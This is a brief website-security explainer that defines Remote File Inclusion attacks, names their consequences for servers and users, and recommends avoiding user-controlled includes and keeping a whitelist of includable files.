Is my Site Secure?

Remote File Inclusion

Remote File Inclusion (RFI)

Remote File Inclusion (RFI) is a type of cyber attack that specifically targets web application vulnerabilities that dynamically reference external scripts, in order to exploit the referencing function to upload malware (e.g. Backdoor shells) from a remote URL that’s located in a different domain. Once an attacker has done this, the malware can then be stored until a function is executed that signals for it to detrimentally affect a website.

Remote File Inclusion generally occurs when a web application receives the path to the file that has to be included as an input without properly sanitising it, which allows an external URL to be supplied to the include statement. Successful RFI attacks can result in information/file disclosure, compromised servers and site control that allows the modification of content; all of which could be incredibly damaging to both users and website owners.

How can I prevent Remote File Inclusion?

To prevent RFI vulnerabilities being exploited by an attacker, you should avoid dynamically including files based on user input and maintain a whitelist of files that can be included to limit an attacker’s control over what is included.